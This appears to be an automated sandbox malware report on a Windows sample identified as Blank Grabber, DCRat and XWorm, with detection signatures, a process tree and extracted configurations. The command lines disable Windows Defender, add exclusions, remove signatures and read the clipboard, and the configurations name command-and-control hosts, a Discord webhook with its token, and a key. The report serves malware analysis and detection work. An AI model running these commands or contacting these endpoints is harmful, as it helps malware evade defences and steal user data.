Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Vjy8d2EoqK.exe

Overview

General Information

Sample name:Vjy8d2EoqK.exe
renamed because original name is a hash value
Original sample name:A0936899FBF31493BBE5E34DC18A9341.exe
Analysis ID:1487977
MD5:a0936899fbf31493bbe5e34dc18a9341
SHA1:1634a9e1759962db670bf244b1b3f5a9e71a25d7
SHA256:b27cdbd5705c56034999011911997559d5eecb66e2e0d8b8c9aa843fe05d1627
Tags:BlankGrabberexe
Infos:

Detection

Blank Grabber, DCRat, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Blank Grabber
Yara detected DCRat
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Removes signatures from Windows Defender
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Suspicious Startup Folder Persistence
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Vjy8d2EoqK.exe (PID: 2596 cmdline: "C:\Users\user\Desktop\Vjy8d2EoqK.exe" MD5: A0936899FBF31493BBE5E34DC18A9341)
    • svchosts.exe (PID: 1436 cmdline: "C:\Users\user\AppData\Local\Temp\svchosts.exe" MD5: 91F72031C3AD088797D77357FA39DB39)
      • wscript.exe (PID: 7200 cmdline: "C:\Windows\System32\WScript.exe" "C:\Brokercrt\aIVfHknoFLGNu6gLK6xZar0.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 7652 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Brokercrt\oqZ1ERFvWaUzYBP9Lou79Kq.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • comReviewsession.exe (PID: 7476 cmdline: "C:\Brokercrt\comReviewsession.exe" MD5: 24DAFEB85B4C72D29606ADF2A59DA04C)
            • Conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • S l r .exe (PID: 5768 cmdline: "C:\Users\user\AppData\Local\Temp\S l r .exe" MD5: D69B290766342861CDE3B24BA1ECD0C6)
      • XClient.exe (PID: 7216 cmdline: "C:\Users\user\AppData\Local\Temp\XClient.exe" MD5: BF19D4A22F47EEA6DD1DB1C98A5AAC07)
        • powershell.exe (PID: 7848 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SolaraBootstrapper.exe (PID: 7248 cmdline: "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe" MD5: 6557BD5240397F026E675AFB78544A26)
        • conhost.exe (PID: 7264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Built.exe (PID: 6496 cmdline: "C:\Users\user\AppData\Local\Temp\Built.exe" MD5: EC729E4911261337E4CA4E9FC77F942B)
  • Built.exe (PID: 6252 cmdline: "C:\Users\user\AppData\Local\Temp\Built.exe" MD5: EC729E4911261337E4CA4E9FC77F942B)
    • cmd.exe (PID: 7372 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7564 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 7380 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7552 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 7400 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7596 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7428 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 7620 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • cmd.exe (PID: 7976 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 8032 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • cmd.exe (PID: 8052 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 8108 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • cmd.exe (PID: 8148 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 4192 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • cmd.exe (PID: 2656 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 5956 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • cmd.exe (PID: 7980 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7452 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • Conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7704 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7624 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 8120 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 1396 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7204 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7768 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • dasHost.exe (PID: 7324 cmdline: C:\Windows\SysWOW64\it-IT\dasHost.exe MD5: 24DAFEB85B4C72D29606ADF2A59DA04C)
  • dasHost.exe (PID: 8064 cmdline: C:\Windows\SysWOW64\it-IT\dasHost.exe MD5: 24DAFEB85B4C72D29606ADF2A59DA04C)
  • dwm.exe (PID: 8060 cmdline: "C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe" MD5: 24DAFEB85B4C72D29606ADF2A59DA04C)
  • iKSiRODBDWoPAMSDKBDQBFN.exe (PID: 7568 cmdline: "C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe" MD5: 24DAFEB85B4C72D29606ADF2A59DA04C)
  • iKSiRODBDWoPAMSDKBDQBFN.exe (PID: 7776 cmdline: "C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe" MD5: 24DAFEB85B4C72D29606ADF2A59DA04C)
  • cleanup
{"C2 url": ["cash-spoken.gl.at.ply.gg"], "Port": "27573", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
{"SCRT": "{\"L\":\"*\",\"X\":\"~\",\"S\":\",\",\"W\":\"(\",\"d\":\"@\",\"A\":\"$\",\"M\":\"<\",\"j\":\"`\",\"h\":\"|\",\"Q\":\"#\",\"w\":\"-\",\"9\":\")\",\"C\":\";\",\"4\":\" \",\"H\":\"!\",\"B\":\"%\",\"0\":\"^\",\"y\":\"&\",\"3\":\">\",\"J\":\".\",\"5\":\"_\"}", "PCRT": "{\"f\":\"$\",\"6\":\".\",\"S\":\"-\",\"Q\":\"~\",\"c\":\"`\",\"i\":\"^\",\"b\":\"_\",\"M\":\"(\",\"w\":\"<\",\"e\":\">\",\"j\":\")\",\"l\":\"&\",\"I\":\" \",\"=\":\"#\",\"y\":\";\",\"X\":\",\",\"D\":\"!\",\"p\":\"%\",\"0\":\"*\",\"x\":\"|\"}", "TAG": "", "MUTEX": "DCR_MUTEX-8bX0OVuOnvbm27qz2KER", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": null, "AS": false, "ASO": false, "AD": false, "H1": "http://a1009150.xsph.ru/@==gbJBzYuFDT", "H2": "http://a1009150.xsph.ru/@==gbJBzYuFDT", "T": "0"}
{"C2 url": "https://discordapp.com/api/webhooks/1255594789861195827/8s6rt3E8edVCsvsaavUpcA9mRxd3KM7eS7ju4bkPhLPkUvlnCQyyUrBISoboFGoSAAiq"}
SourceRuleDescriptionAuthorStrings
Vjy8d2EoqK.exeJoeSecurity_XWormYara detected XWormJoe Security
    Vjy8d2EoqK.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x80357e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x80361b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x803730:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x802ecc:$cnc4: POST / HTTP/1.1
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\XClient.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Roaming\XClient.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xbbca:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xbc67:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xbd7c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xb518:$cnc4: POST / HTTP/1.1
      C:\Users\user\AppData\Local\Temp\_MEI64962\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        C:\Users\user\AppData\Local\Temp\XClient.exeJoeSecurity_XWormYara detected XWormJoe Security
          C:\Users\user\AppData\Local\Temp\XClient.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xbbca:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0xbc67:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0xbd7c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0xb518:$cnc4: POST / HTTP/1.1
          Click to see the 2 entries
          SourceRuleDescriptionAuthorStrings
          00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0xd056:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x2006e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0xd0f3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x2010b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0xd208:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x20220:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0xc9a4:$cnc4: POST / HTTP/1.1
            • 0x1f9bc:$cnc4: POST / HTTP/1.1
            00000001.00000003.1694117012.0000021AFD7E2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              00000039.00000002.2145328378.0000000002852000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                00000037.00000002.2144420087.00000000031E2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  Click to see the 43 entries
                  SourceRuleDescriptionAuthorStrings
                  4.0.S l r .exe.409294.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
                    4.0.S l r .exe.409294.1.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0x9dca:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0x9e67:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0x9f7c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0x9718:$cnc4: POST / HTTP/1.1
                    4.3.S l r .exe.569e78.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                      4.3.S l r .exe.569e78.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                      • 0x9dca:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      • 0x9e67:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                      • 0x9f7c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                      • 0x9718:$cnc4: POST / HTTP/1.1
                      0.3.Vjy8d2EoqK.exe.e954a4.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
                        Click to see the 30 entries

                        System Summary

                        barindex
                        Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Brokercrt\comReviewsession.exe, ProcessId: 7476, TargetFilename: C:\Windows\SysWOW64\it-IT\dasHost.exe
                        Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Default\Templates\iKSiRODBDWoPAMSDKBDQBFN.exe", EventID: 13, EventType: SetValue, Image: C:\Brokercrt\comReviewsession.exe, ProcessId: 7476, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\iKSiRODBDWoPAMSDKBDQBFN
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Built.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Built.exe, ParentProcessId: 6252, ParentProcessName: Built.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'", ProcessId: 7372, ProcessName: cmd.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Built.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Built.exe, ParentProcessId: 6252, ParentProcessName: Built.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7380, ProcessName: cmd.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\XClient.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\XClient.exe, ParentProcessId: 7216, ParentProcessName: XClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', ProcessId: 7848, ProcessName: powershell.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7372, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe', ProcessId: 7564, ProcessName: powershell.exe
                        Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Built.exe, ProcessId: 6252, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr
